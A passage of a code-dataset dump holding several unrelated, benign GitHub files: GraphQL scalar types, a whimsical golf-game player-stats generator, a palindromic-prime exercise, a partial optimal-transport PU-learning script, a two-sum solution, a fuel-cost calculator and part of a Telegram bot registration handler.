StringValueNode):\n raise ValueError(\n \"Date should be represented as a string in input: \" + print_ast(value_node),\n value_node,\n )\n return parse_date_value(value_node.value)\n\nDate = graphql.type.GraphQLScalarType(\n name = 'Date',\n description = 'A date element, serialized in standard \"YYYY-MM-DD\" format',\n serialize = serialize_date,\n parse_value = parse_date_value,\n parse_literal = parse_date_literal,\n)\n\n# time type\n\ndef serialize_time(output_value: datetime.time) -> str:\n \"\"\" Serializes an internal value to include in a response. \"\"\"\n return output_value.isoformat()\n\ndef parse_time_value(input_value: Any) -> datetime.time:\n \"\"\" Parses an externally provided value to use as an input. \"\"\"\n try:\n return DEFAULT_ISOPARSER.parse_isotime(input_value)\n except Exception as error:\n raise ValueError(f'Cannot parse Time from: {repr(input_value)}, got: {error}') from error\n\ndef parse_time_literal(value_node: ValueNode, _variables: Any = None) -> datetime.time:\n \"\"\" Parses an externally provided AST value to use as an input. \"\"\"\n if not isinstance(value_node, StringValueNode):\n raise ValueError(\n \"Time should be represented as a string in input: \" + print_ast(value_node),\n value_node,\n )\n return parse_time_value(value_node.value)\n\nTime = graphql.type.GraphQLScalarType(\n name = 'Time',\n description = 'A time element, serialized in standard \"hh:ii::ss.mmmmmm\" format',\n serialize = serialize_time,\n parse_value = parse_time_value,\n parse_literal = parse_time_literal,\n)\n\n# JSON type\n\ndef serialize_jsonstring(output_value):\n \"\"\" Serializes an internal value to include in a response. \"\"\"\n return json.dumps(output_value)\n\ndef parse_jsonstring_value(input_value):\n \"\"\" Parses an externally provided value to use as an input. \"\"\"\n try:\n return json.loads(input_value)\n except Exception as error:\n raise ValueError(\n f'Cannot parse JSONString from: {repr(input_value)}, got: {error}') from error\n\ndef parse_jsonstring_literal(value_node, _variables = None):\n \"\"\" Parses an externally provided AST value to use as an input. \"\"\"\n if not isinstance(value_node, StringValueNode):\n raise ValueError(\n \"JSONString should be represented as a string in input: \" + print_ast(value_node),\n value_node,\n )\n return parse_jsonstring_value(value_node.value)\n\nJSONString = graphql.type.GraphQLScalarType(\n name = 'JSONString',\n description = 'JSON in a string',\n serialize = serialize_jsonstring,\n parse_value = parse_jsonstring_value,\n parse_literal = parse_jsonstring_literal,\n)\n","repo_name":"bridgermusic/easy-graphql-server","sub_path":"src/easy_graphql_server/graphql_types.py","file_name":"graphql_types.py","file_ext":"py","file_size_in_byte":6572,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"31123031853","text":"import random, uuid, math\nfrom typing import NamedTuple\nfrom datetime import date\nimport json\n\nfrom . import saved_mod_data\n\ndef random_player_emoji(rng):\n humanoid = [\"👶\",\"👧\",\"🧒\",\"👦\",\"👩\",\"🧑\",\"👨\",\"👩‍🦱\",\"🧑‍🦱\",\"👨‍🦱\",\"👩‍🦰\",\"🧑‍🦰\",\"👨‍🦰\",\"👱‍♀️\",\n\"👱\",\"👱‍♂️\",\"👩‍🦳\",\"🧑‍🦳\",\"👨‍🦳\",\"👩‍🦲\",\"🧑‍🦲\",\"👨‍🦲\",\"🧔\",\"👵\",\"🧓\",\"👴\",\"👲\",\"👳‍♀️\",\n\"👳\",\"👳‍♂️\",\"🧕\",\"👮‍♀️\",\"👮\",\"👮‍♂️\",\"👷‍♀️\",\"👷\",\"👷‍♂️\",\"💂‍♀️\",\"💂\",\"💂‍♂️\",\"🕵️‍♀️\",\"🕵️\",\n\"🕵️‍♂️\",\"👩‍⚕️\",\"🧑‍⚕️\",\"👨‍⚕️\",\"👩‍🌾\",\"🧑‍🌾\",\"👨‍🌾\",\"👩‍🍳\",\"🧑‍🍳\",\"👨‍🍳\",\"👩‍🎓\",\"🧑‍🎓\",\"👨‍🎓\",\"👩‍🎤\",\n\"🧑‍🎤\",\"👨‍🎤\",\"👩‍🏫\",\"🧑‍🏫\",\"👨‍🏫\",\"👩‍🏭\",\"🧑‍🏭\",\"👨‍🏭\",\"👩‍💻\",\"🧑‍💻\",\"👨‍💻\",\"👩‍💼\",\"🧑‍💼\",\"👨‍💼\",\n\"👩‍🔧\",\"🧑‍🔧\",\"👨‍🔧\",\"👩‍🔬\",\"🧑‍🔬\",\"👨‍🔬\",\"👩‍🎨\",\"🧑‍🎨\",\"👨‍🎨\",\"👩‍🚒\",\"🧑‍🚒\",\"👨‍🚒\",\"👩‍✈️\",\"🧑‍✈️\",\n\"👨‍✈️\",\"👩‍🚀\",\"🧑‍🚀\",\"👨‍🚀\",\"👩‍⚖️\",\"🧑‍⚖️\",\"👨‍⚖️\",\"👰\",\"🏋️\",\"🤵\",\"🤸\",\"👸\",\"🤴\",\"🦸‍♀️\",\"🦸\",\n\"🦸‍♂️\",\"🦹‍♀️\",\"🦹\",\"🦹‍♂️\",\"🤶\",\"🚴\",\"🎅\",\"🧙‍♀️\",\"🧙\",\"🧙‍♂️\",\"🧝‍♀️\",\"🧝\",\"🧝‍♂️\",\"🧛‍♀️\",\"🧛\",\n\"🧛‍♂️\",\"🧟‍♀️\",\"🧟\",\"🧟‍♂️\",\"🧞‍♀️\",\"🧞\",\"🧞‍♂️\",\"🧜‍♀️\",\"🧜\",\"🧜‍♂️\",\"🧚‍♀️\",\"🧚\",\"🧚‍♂️\",\"👼\",\"🤰\",\n\"🤱\",\"🙇‍♀️\",\"🙇\",\"🙇‍♂️\",\"💁‍♀️\",\"💁\",\"💁‍♂️\",\"🙅‍♀️\",\"🙅\",\"🙅‍♂️\",\"🙆‍♀️\",\"🙆\",\"🙆‍♂️\",\"🙋‍♀️\",\"🙋\",\n\"🙋‍♂️\",\"🧏‍♀️\",\"🧏\",\"🧏‍♂️\",\"🤦‍♀️\",\"🤦\",\"🤦‍♂️\",\"🤷‍♀️\",\"🤷\",\"🤷‍♂️\",\"🙎‍♀️\",\"🙎\",\"🙎‍♂️\",\"🙍‍♀️\",\"🙍\",\n\"🙍‍♂️\",\"💇‍♀️\",\"💇\",\"💇‍♂️\",\"💆‍♀️\",\"💆\",\"💆‍♂️\",\"🧖‍♀️\",\"🧖\",\"🧖‍♂️\",\"💅\",\"🤳\",\"💃\",\"🕺\",\"🕴\",\"👩‍🦽\",\n\"🧑‍🦽\",\"👨‍🦽\",\"👩‍🦼\",\"🧑‍🦼\",\"👨‍🦼\",\"🚶‍♀️\",\"🚶\",\"🚶‍♂️\",\"👩‍🦯\",\"🧑‍🦯\",\"👨‍🦯\",\"🧎‍♀️\",\"🧎\",\"🧎‍♂️\",\"🏃‍♀️\",\"🏃\",\n\"🏃‍♂️\",\"🧍‍♀️\",\"🧍\",\"🧍‍♂️\",\"👭\",\"🧑‍🤝‍🧑\",\"👬\",\"👫\",\"👩‍❤️‍👩\",\"💑\",\"👨‍❤️‍👨\",\"👩‍❤️‍👨\",\"👩‍❤️‍💋‍👩\",\"💏\",\"👨‍❤️‍💋‍👨\",\"👩‍❤️‍💋‍👨\",\n\"👪\",\"👨‍👩‍👦\",\"👨‍👩‍👧\",\"👨‍👩‍👧‍👦\",\"👨‍👩‍👦‍👦\",\"👨‍👩‍👧‍👧\",\"👨‍👨‍👦\",\"👨‍👨‍👧\",\"👨‍👨‍👧‍👦\",\"👨‍👨‍👦‍👦\",\"👨‍👨‍👧‍👧\",\"👩‍👩‍👦\",\"👩‍👩‍👧\",\"👩‍👩‍👧‍👦\",\"👩‍👩‍👦‍👦\",\"👩‍👩‍👧‍👧\",\n\"👨‍👦\",\"👨‍👦‍👦\",\"👨‍👧\",\"👨‍👧‍👦\",\"👨‍👧‍👧\",\"👩‍👦\",\"👩‍👦‍👦\",\"👩‍👧\",\"👩‍👧‍👦\",\"👩‍👧‍👧\",\"🗣\",\"👤\",\"👥\"]\n\n nonhumanoid=[\n\"🐶\",\"🐱\",\"🐭\",\"🐹\",\"🐰\",\"🦊\",\"🐻\",\"🐼\",\"🐨\",\"🐯\",\"🦁\",\"🐮\",\"🐷\",\"🐽\",\"🐸\",\"🐵\",\n\"🙈\",\"🙉\",\"🙊\",\"🐒\",\"🐔\",\"🐧\",\"🐦\",\"🐤\",\"🐣\",\"🐥\",\"🦆\",\"🦅\",\"🦉\",\"🦇\",\"🐺\",\"🐗\",\"🐴\",\"🦄\",\n\"🐝\",\"🐛\",\"🦋\",\"🐌\",\"🐞\",\"🐞\",\"🦟\",\"🦗\",\"🐞\",\"🦂\",\"🐢\",\"🐍\",\"🦎\",\"🦖\",\"🦕\",\"🐙\",\"🦑\",\"🦐\", #🐜 and 🕷️ have been replaced by 🐞 to stand out against discord's dark background better\n\"🦞\",\"🦀\",\"🐡\",\"🐠\",\"🐟\",\"🐬\",\"🐳\",\"🐋\",\"🦈\",\"🐊\",\"🐅\",\"🐆\",\"🦓\",\"🦍\",\"🦧\",\"🐘\",\"🦛\",\"🦏\",\n\"🐪\",\"🐫\",\"🦒\",\"🦘\",\"🐃\",\"🐂\",\"🐄\",\"🐎\",\"🐖\",\"🐏\",\"🐑\",\"🦙\",\"🐐\",\"🦌\",\"🐕\",\"🐩\",\"🦮\",\"🐕‍🦺\",\n\"🐈\",\"🐓\",\"🦃\",\"🦚\",\"🦜\",\"🦢\",\"🦩\",\"🕊️\",\"🐇\",\"🦝\",\"🦨\",\"🦡\",\"🦦\",\"🦥\",\"🐁\",\"🐀\",\"🐿\",\"🦔\",\n\"🐉\",\"🐲\",\"🪐\",\"💫\",\"🌪\",\"🌈\",\"📠\",\"📺\"]\n\n if rng.random() > 0.5:\n return rng.choice(humanoid)\n else:\n return rng.choice(nonhumanoid)\n\nclass PlayerStlats(NamedTuple):\n stance: str = \"Incredibly boring\"\n fav_tea: str = \"Iced\"\n nyoomability: float = 1.5 # movement speed\n\n # unused for now except for fun\n tofu: float = 4\n wiggle: float = 0.5 # chance someone breaks out of a bird / someone about to bump into a swordfight holds back instead\n ritualism: float = 2\n\n unworthiness: float = 0.5\n splortsmanship: float = 1.0\n tankitude: float = 1.0\n pettiness: float = 0.0\n owlishness: float = 0.0\n disco: float = 0.0\n pettability: float = 0.0\n softness: float = 0.0\n improv: float = 0.0\n tentacles: int = 1\n capitalism: float = -0.5\n\n # shot power stats\n musclitude: float = 1.0 # how hard you swing\n finesse: float = 1.0 # how consistent your shots are hit with power, higher = better\n estimation: int = 0\n\n # swordfighting stlats\n churliness: float = 0.2 # how likely this player will go for offensive options in a swordfight\n earliness: float = 0.2 # how likely this player will go for defensive options in a swordfight\n twirliness: float = 0.2 # how likely this player will go for stylish options in a swordfight\n aceness: float = 0.3 # chance of resisting a kiss\n marbles: int = 3 # beginning-of-fight swordfighting hp\n\n polkadottedness: int = 0 # used for easter egg\n\n # shot angle stats\n needlethreadableness: float = 0.8 # how well you thread the needle (multiplier for how much angle variance your shots have), lower = better\n left_handedness: float = 0.0 # how biased your shots are to the left or right. can go negative, 0 = best, away from 0 = worse\n\n sin_rating = None\n\nclass Player:\n def __init__(self, name:str, stlats: PlayerStlats, emoji:str=\"🏌️\", id:str=\"\", feed_entries = None, modifications=None):\n self.name = name\n self.stlats = stlats\n self.emoji = emoji\n self.id = id\n \n self.feed_entries = []\n if feed_entries is not None:\n self.feed_entries = feed_entries\n\n self.modifications = []\n if modifications is not None:\n self.modifications = modifications\n \n\n def unpredictability(self): \n # how much someone sticks to one swordfighting style. 0-1, 1 = better\n # if someone will always choose offensive, this is 0. if it's split evenly betwen churliness, earliness, and twirliness, it's 1\n weights = [self.stlats.churliness,self.stlats.earliness,self.stlats.twirliness]\n if self.stlats.stance in (\"Aggro\",\"Powerful\",\"Hand to Hand\",\"DPS\",\"Explosive\",\"Hardcore\", \"Wibble\",\"Electric\"): #offense-boosting stances\n weights[0] += 0.5\n # earliness-boosting stances\n elif self.stlats.stance in (\"Tanky\",\"Twitchy\",\"Repose\",\"Reverse\",\"Softcore\", \"Cottagecore\",\"Pomegranate\"): # defense-boosting stances\n weights[1] += 0.5\n #twirliness-boosting stances\n if self.stlats.stance in (\"Feint\",\"Tricky\",\"Pop-Punk\",\"Flashy\",\"Spicy\", \"Corecore\",\"Wobble\",\"Lefty\"): # style-boosting stances\n weights[2] += 0.5\n\n weights = sorted(weights, reverse=True)\n\n chanceOfBiggest = weights[0]/sum(weights) #this ranges from highest = 1 to lowest = 1/len(weights)\n\n minChance = 1/len(weights)\n\n return 1-(chanceOfBiggest-minChance)/(1-minChance)\n\n\n def compute_driving_moons(self):\n return format_stlat_display(self.driving_rating())\n\n def driving_rating(self): # \"Driving\": hitting, and driving a kart\n # +disco + tankitude\n rating_number = (self.stlats.musclitude + self.stlats.tofu)*5/2\n return rating_number\n\n def compute_precision_moons(self):\n return format_stlat_display(self.precision_rating())\n\n def precision_rating(self):\n # +pettability + splortsmanship +tentacles\n rating_number = ((1-self.stlats.needlethreadableness)*0.5 + self.stlats.finesse + self.stlats.estimation*0.2) * 5/(1+0.2+0.5) - abs(self.stlats.left_handedness)\n return rating_number\n\n def compute_aerodynamics_moons(self):\n return format_stlat_display(self.aerodynamics_rating())\n\n def aerodynamics_rating(self):\n # +ritualism +softness +owlishness - unworthiness\n\n rating_number = (self.stlats.ritualism + self.stlats.owlishness + self.stlats.softness) * 5/3 #unused for now, need more stlats\n return rating_number\n\n def compute_self_awareness_moons(self):\n return format_stlat_display(self.self_awareness_rating())\n\n def self_awareness_rating(self):\n # - self.stlats.pettiness - capitalism + improv + tentacles\n rating_number = (self.stlats.wiggle*0.5 + (self.stlats.marbles-2)/2 + self.unpredictability()*0.8) * 5/(0.5+1+0.8) + self.stlats.polkadottedness * 5 #means nothing for now\n return rating_number\n\n def get_biggest_stlat_rating(self):\n ratings = [\n (\"Driving\", self.driving_rating()),\n (\"Precision\", self.precision_rating()),\n (\"Aerodynamics\", self.aerodynamics_rating()),\n (\"Self-Awareness\", self.self_awareness_rating()),\n ]\n ratings.sort(key=lambda item:item[1], reverse=True)\n return ratings[0]\n\n def modifications_string(self):\n if len(self.modifications) == 0:\n return \"\"\n else:\n preamble = \"**Modifications**: \\n\"\n return preamble + \"\\n\".join([self.modification_string(mod) for mod in self.modifications])\n\n def modification_string(self, mod_dict):\n if type(mod_dict) is str:\n return mod_dict\n try:\n template = f'''- {mod_dict['emoji']} {mod_dict['name']}\n {mod_dict['description']}'''\n except KeyError as e:\n print(e)\n print(\"danger\")\n template = \"- ☢️ Unstable ☢️ \\n This Modification is Unstable. Something has gone very wrong in the dated base. DANGER! DANGER! DANGER!\"\n\n return template\n\n def vk_stat_of_the_day(self):\n stlat_choices = list(self.stlats._fields)\n stlat_choices.remove(\"fav_tea\")\n stlat_choices.remove(\"stance\")\n stlat_choices.remove(\"polkadottedness\")\n #stlat_choices.remove(\"sin_rating\")\n today = date.today()\n rng = random.Random(today.isoformat()) # seed rng with today's date\n\n stlatname = rng.choice(stlat_choices)\n stlat = getattr(self.stlats, stlatname, ':ghost:')\n\n fancystlatname = stlatname.replace(\"_\",\" \").title()\n return f\"**Today's Verboten Knowledge Stlat:**\\n||{fancystlatname}: {stlat:.2f}||\"\n\n def get_display_name(self, with_mods_in_parens = False):\n if with_mods_in_parens and len(self.modifications) > 0:\n modList = ', '.join([mod.displayEmoji for mod in self.modifications])\n return f\"{self.name} ({self.emoji}) ({modList})\"\n else:\n return f\"{self.name} ({self.emoji})\"\n\n @classmethod\n def from_dict(cls, data: dict):\n # Given a dict with {\"id\": blah, \"stlats\":<blah>} from the DB, construct a new Player\n data[\"stlats\"] = PlayerStlats(*data[\"stlats\"])\n data[\"modifications\"] = [saved_mod_data.SavedModificationDataTemplate(**mod_dict) for mod_dict in data[\"modifications\"]]\n return cls(**data)\n\n def to_dict(self):\n # convert player into a dict, for saving in the DB\n\n dict = self.__dict__\n dict[\"modifications\"] = [mod_dict.to_dict() for mod_dict in self.modifications]\n\n return dict\n\n\n\ndef generate_random_player_from_name(name=\"Random Player\", emoji=\"🏌️\"):\n \"\"\"\n Generate a completely random player.\n \"\"\"\n\n seed = name.strip().title()\n\n rng = random.Random(seed)\n if seed:\n id_ = uuid.uuid3(uuid.NAMESPACE_X500, name=str(seed)).hex\n else:\n id_ = uuid.uuid4().hex\n\n stlats = generate_random_stlats_from_name(name)\n\n if emoji is not None:\n emoji = random_player_emoji(rng)\n\n return Player(name=name, id=id_, stlats=stlats,emoji=emoji)\n \n\n\ndef generate_random_stlats_from_name(name=\"Random Player\"):\n # Generate stlats for a player using their name\n name = name.strip().title() # case insensitive\n\n rng = random.Random(name) #seed with name\n\n return PlayerStlats(\n nyoomability = max(rng.gauss(0,0.3),1.4),\n tofu= rng.random(), \n wiggle= rng.random(), \n ritualism= rng.random(), \n musclitude= rng.random(),\n finesse= rng.random(),\n needlethreadableness= rng.random(), \n left_handedness= rng.gauss(0,0.3), \n stance= rng.choice([\"Tricky\",\"Flashy\",\"Aggro\",\"Tanky\",\"Twitchy\",\"Powerful\",\n \"Wibble\",\"Wobble\",\"Reverse\",\"Feint\",\"Electric\",\"Spicy\",\"Pomegranate\",\n \"Explosive\",\"Cottagecore\",\"Corecore\",\"Hardcore\",\"Softcore\",\n \"Hand to Hand\",\"Lefty\",\"Pop-Punk\",\"DPS\",\"Repose\"]),\n fav_tea= rng.choice([\"Iced\",\"Boba\",\"White\",\"Green\",\"Oolong\",\n \"Pu'erh\",\"Chai\",\"Milk\",\"Neon\",\"Sweet\",\"Void\",\"Tea?\",\"Caramel\",\n \"Lightspeed\",\"Time-traveling\",\"Bloody\",\"Black\",\"Miso\",\"Concrete\",\n \"Hard-boiled egg\",\"Hot Chocolate\",\"Bubble\"]),\n estimation= rng.random(),\n\n earliness= rng.random(),\n twirliness= rng.random(),\n churliness= rng.random(),\n aceness=rng.random(),\n marbles= rng.randrange(2,4),\n\n unworthiness=rng.random(),\n splortsmanship=rng.random(),\n tankitude=rng.random(),\n pettiness=rng.random(),\n owlishness=rng.random(),\n disco=rng.random(),\n pettability=rng.random(),\n softness=rng.random(),\n improv=rng.random(),\n tentacles= rng.randrange(0,10),\n capitalism= -rng.random() # always negative\n\n )\n\ndef player_with_mods_but_random_stats(name, mods):\n player = generate_random_player_from_name(name)\n player.modifications = mods\n return player\n\n\n# Easter egg: polkadot has max stats\nknown_players = {\n \"Polkadot Patterson\": Player(name=\"Polkadot Patterson\", id=1, stlats=PlayerStlats(\n stance=\"Squiddish\",\n fav_tea= \"Iced\",\n nyoomability = 1.5,\n musclitude=1,\n finesse=1,\n needlethreadableness=1,\n polkadottedness=1, \n left_handedness= 0,\n estimation=1,\n twirliness=0.3,\n churliness=0.3,\n earliness=0.3,\n marbles=4,\n\n tofu=1, # unused\n wiggle=1, # unused\n ritualism=1, # unused\n owlishness=1,\n softness=1,\n unworthiness=0,\n tentacles=4,\n ),emoji=\"😅\"),\n \"Simulacrum\": player_with_mods_but_random_stats(\"Simulacrum\",[saved_mod_data.spookyGrandUnchipMod]),\n \"Solar Dies\": player_with_mods_but_random_stats(\"Solar Dies\",[saved_mod_data.spookyGrandUnchipMod]),\n \"Load Bearing Coconut\": player_with_mods_but_random_stats(\"Load Bearing Coconut\",[saved_mod_data.championshipJacket]),\n \"Frankle Knives\": player_with_mods_but_random_stats(\"Frankle Knives\",[saved_mod_data.championshipJacket]),\n \"Spooks Mcgee\": player_with_mods_but_random_stats(\"Spooks McGee\",[saved_mod_data.championshipJacket]),\n \"Line Cook\": player_with_mods_but_random_stats(\"Line Cook\",[saved_mod_data.championshipJacket]),\n \"The 12th Herb And Spice\": player_with_mods_but_random_stats(\"The 12th Herb And Spice\",[saved_mod_data.championshipJacket]),\n \"Caldera Clembons\": player_with_mods_but_random_stats(\"Caldera Clembons\",[saved_mod_data.buff]),\n \"1\": player_with_mods_but_random_stats(\"1\",[saved_mod_data.foxFriendship]),\n # \"Hands Scoresburg\": player_with_mods_but_random_stats(\"Hands Scoresburg\",[\"🖊️🏄\"]), #I've forgotten what this means\n \"Test Robot\": player_with_mods_but_random_stats(\"Test Robot\",[saved_mod_data.spookyGrandUnchipMod]),\n \"Dog Dad\": player_with_mods_but_random_stats(\"Dog Dad\",[saved_mod_data.voidTrapped,saved_mod_data.championshipJacket]),\n \"Melissa Bop\": player_with_mods_but_random_stats(\"Melissa Bop\", [saved_mod_data.nutrisocks]),\n \"Merriment Roomba\": player_with_mods_but_random_stats(\"Melissa Bop\", [saved_mod_data.championshipJacket])\n}\nknown_players[\"Alto\"] = known_players[\"Polkadot Patterson\"]\n\n\ndef generate_player_from_name(name):\n # if they're not there, generate a player from their name with random stats\n # or, if it's a known player, generate them with known stuff\n if name.title() in known_players:\n return known_players[name.title()]\n else:\n return generate_random_player_from_name(name)\n\ndef format_stlat_display(mooncount: float):\n num_stars = math.floor(abs(mooncount))\n whole_moons = \"🌕\" * num_stars\n remainder = abs(mooncount)-num_stars\n if mooncount > 0:\n if remainder >= 0.75:\n return whole_moons + \"🌖\"\n elif remainder >= 0.5:\n return whole_moons + \"🌗\"\n elif remainder >= 0.25:\n return whole_moons + \"🌘\"\n else: #remainder < 0.25\n return whole_moons\n else:\n print(remainder)\n if remainder >= 0.75:\n return \"-🌔\"+whole_moons\n elif remainder >= 0.5:\n return \"-🌓\"+whole_moons\n elif remainder >= 0.25:\n return \"-🌒\" + whole_moons\n else: #remainder < 0.25\n if num_stars == 0:\n return \"\" # no negative sign for zero, otherwise it would just be \"-\"\n return \"-\" + whole_moons\n\n","repo_name":"hillexed/glolf","sub_path":"glolf/data/playerstlats.py","file_name":"playerstlats.py","file_ext":"py","file_size_in_byte":17888,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"9919582990","text":"#Kovlin Perumal\r\n#PRMKOV001\r\n#09/05/2014\r\n#Palindromic Primes Function\r\n\r\nimport sys, math\r\nsys.setrecursionlimit (30000)#Set recursion limt\r\n\r\n\r\nfrom math import *\r\n\r\ndef palinCheck(num) :#Same function converted from question one\r\n num = str(num)\r\n if len(num) == 1 or len(num) == 0:\r\n return True\r\n else :\r\n if num[0] != num[-1] :\r\n return False\r\n else:\r\n return palinCheck(num[1:len(num) - 1])\r\n \r\ndef isprime(num,k):\r\n if num <= 1:\r\n return False\r\n elif math.sqrt(num) < k: #If the squareroot is exceeded number must be a prime because one half of factors exhausted\r\n return True\r\n elif num%k == 0 :\r\n return False #If divisible not a prime\r\n else:\r\n return isprime(num,k+1) #Recall function to check whether num is divisible by the next value of k\r\n\r\na = int(input('Enter the starting point N:\\n'))\r\nb = int(input('Enter the ending point M:\\n')) #Recieve input\r\n\r\nprint('The palindromic primes are:')\r\n\r\ndef output(start, end) : #Recursive function to replace a loop for output\r\n if start > end :\r\n return \r\n else:\r\n if palinCheck(start):\r\n if isprime(start,2): #Call the previous functions to check whether a num in the entered interval is a palindrome and prime\r\n print(start)\r\n output(start+1,end)\r\n \r\noutput(a,b)\r\n\r\n\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/prmkov001/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43254996483","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jun 24 21:31:13 2021\r\n\r\n@author: Administrator\r\n\"\"\"\r\n\r\n\r\n\r\nimport numpy as np\r\nimport scipy as sp\r\n\r\n\r\nimport ot\r\nimport utils\r\n\r\nimport KM\r\n\r\n\r\n\r\nfrom sklearn.metrics import f1_score\r\n\r\n\r\ndef compute_cost_matrices(P, U, prior, nb_dummies=0):\r\n\r\n # Positive dataset with dummy points\r\n n_unl_pos = int(U.shape[0]*prior)\r\n P_ = P.copy()\r\n P_ = np.vstack([P_, np.zeros((nb_dummies, P.shape[1]))])\r\n\r\n # weigths\r\n mu = (np.ones(len(P_))/(len(P_)-nb_dummies))*(n_unl_pos/len(U))\r\n if nb_dummies > 0:\r\n mu[-nb_dummies:] = (1 - np.sum(mu[:-nb_dummies]))/nb_dummies\r\n else:\r\n mu = mu / np.sum(mu)\r\n nu = np.ones(len(U))/len(U)\r\n\r\n # intra-domain\r\n C1 = sp.spatial.distance.cdist(P_, P_)\r\n C2 = sp.spatial.distance.cdist(U, U)\r\n if nb_dummies > 0:\r\n C1[:, -nb_dummies:] = C1[-nb_dummies:, :] = C2.max()*1e2\r\n C1[-nb_dummies:, -nb_dummies:] = 0\r\n\r\n # inter-domain\r\n if P_.shape[1] == U.shape[1]:\r\n C = sp.spatial.distance.cdist(P_, U)\r\n if nb_dummies > 0:\r\n C[-nb_dummies:, :] = 1e2 * C[:-nb_dummies, :].max()\r\n else:\r\n C = None\r\n return C, C1, C2, mu, nu\r\n\r\n\r\ndef pu_w_emd(p, q, C, nb_dummies=1):\r\n\r\n lstlab = np.array([0, 1])\r\n labels_a = np.append(np.array([0]*(len(p)-nb_dummies)),\r\n np.array([1]*(nb_dummies)))\r\n\r\n def f(G):\r\n res = 0\r\n for i in range(G.shape[1]):\r\n for lab in lstlab:\r\n temp = G[labels_a == lab, i]\r\n res += (np.linalg.norm(temp, 1))**0.5\r\n return res\r\n\r\n def df(G):\r\n W = np.zeros(G.shape)\r\n for i in range(G.shape[1]):\r\n for lab in lstlab:\r\n temp = G[labels_a == lab, i]\r\n W[labels_a == lab, i] = 0.5*(np.linalg.norm(temp, 1))**(-0.5)\r\n return W\r\n\r\n Gc = ot.optim.cg(p, q, C, 1e6, f, df, numItermax=20)\r\n return Gc\r\n\r\n\r\nn_unl = 800\r\nn_pos = 400\r\nnb_dummies = 10\r\n\r\nprior = 0.5\r\n\r\ndataset = \"house\"\r\n\r\ndataset_p = dataset\r\ndataset_u = dataset\r\n\r\nP, U, y_u = utils.draw_p_u_dataset_scar(dataset_p, dataset_u, n_pos,\r\n n_unl, prior, 1) \r\n\r\nestimation_prior = KM.estimate_class_prior(P,U)\r\n\r\nCtot, _, _, mu, nu = compute_cost_matrices(P, U, estimation_prior, nb_dummies)\r\n#nb_unl_pos = int(np.sum(y_u))\r\nnb_unl_pos = int(estimation_prior*n_unl)\r\n\r\ntransp_emd = ot.emd(mu, nu, Ctot)\r\ny_hat = np.ones(len(U))\r\nsum_dummies = np.sum(transp_emd[-nb_dummies:], axis=0)\r\ny_hat[np.argsort(sum_dummies)[nb_unl_pos:]] = 0\r\n\r\nf1emd = f1_score(y_u,y_hat,average = 'micro')\r\n\r\n\r\ntransp_emd_group = pu_w_emd(mu, nu, Ctot, nb_dummies)\r\ny_hat = np.ones(len(U))\r\nsum_dummies = np.sum(transp_emd_group[-nb_dummies:], axis=0)\r\ny_hat[np.argsort(sum_dummies)[nb_unl_pos:]] = 0\r\n \r\nf1groups = f1_score(y_u,y_hat,average = 'micro')","repo_name":"guwengw/PW","sub_path":"partial_wasserstein.py","file_name":"partial_wasserstein.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1275292200","text":"class Solution:\n def twoSum(self,numbers,target):\n i = 0\n j = len(numbers)-1\n while(i < len(numbers) and j != 0):\n if i != j:\n if numbers[i] + numbers[j] == target:\n return [i+1,j+1]\n elif numbers[i] + numbers[j] < target:\n i += 1\n else:\n j -= 1\n\nnumbers = list(map(int, input().split()))\ntarget = int(input())\nob = Solution()\nprint(ob.twoSum(numbers, target))","repo_name":"rupeshmohanty/Competitive-programming-problems","sub_path":"Python/Leetcode/twoSum.py","file_name":"twoSum.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29223318891","text":"from calculo import Calculo\n\n\ndef main():\n calc = Calculo()\n\n distancia = float(input(\"Distância em Quilômetros a ser percorrida? \\n\"))\n consumo = float(input(\"Consumo de combustível do veículo (Km/l)? \\n\"))\n combustivel = float(input(\"Escolha o combustivel: 1-Alcool, 2-Gasolina, 3-Diesel ou 4-Todos: \"))\n\n\n if combustivel == 1:\n print(\"O seu gasto em Álcool será de R$\", (calc.calcular_gasto_alcool(distancia, consumo)))\n elif combustivel == 2:\n print(\"O seu gasto em Gasolina será de R$\", (calc.calcular_gasto_gasolina(distancia, consumo)))\n elif combustivel == 3:\n print(\"O seu gasto em Díesel será de R$\", (calc.calcular_gasto_diesel(distancia, consumo)))\n elif combustivel == 4:\n print(\"Segue a relação de todos os combustiveis:\")\n print(\"Alcool R$ \", calc.calcular_gasto_alcool(distancia, consumo))\n print(\"Gasolina R$ \", calc.calcular_gasto_gasolina(distancia, consumo))\n print(\"Diesel R$ \", calc.calcular_gasto_diesel(distancia, consumo))\n else:\n print(\"Opção errada! Escolha uma das opções acima.\")\n exit()\n\nif __name__ == \"__main__\":\n main()","repo_name":"alves-wanderson/Python_calc_combustivel","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71070503800","text":"from aiogram import types\nfrom aiogram.dispatcher import FSMContext\n\nfrom tgbot.data.data import _\nfrom tgbot.service.repo.region_repo import RegionRepo\nfrom tgbot.service.repo.repository import SQLAlchemyRepos\nfrom tgbot.states.states import RegisterForm\n\n\nasync def get_name(message: types.Message, state: FSMContext):\n name = message.text\n if not name.isdigit():\n await state.update_data(name=name)\n await message.answer(\n text=_('Введите вашу фамилию'),\n reply_markup=types.InlineKeyboardMarkup(\n row_width=1,\n inline_keyboard=[\n [types.InlineKeyboardButton(text=_('❌ Отмена'), callback_data='cancel')]\n ]\n )\n )\n await RegisterForm.surname.set()\n else:\n await message.answer(\n text=_('⚠️ Вводите данные в правильном формате')\n )\n\n\nasync def get_surname(message: types.Message, state: FSMContext):\n surname = message.text\n if not surname.isdigit():\n await state.update_data(surname=surname)\n await message.answer(\n text=_('Введите ваш возраст. Мы принимаем заявки начиная 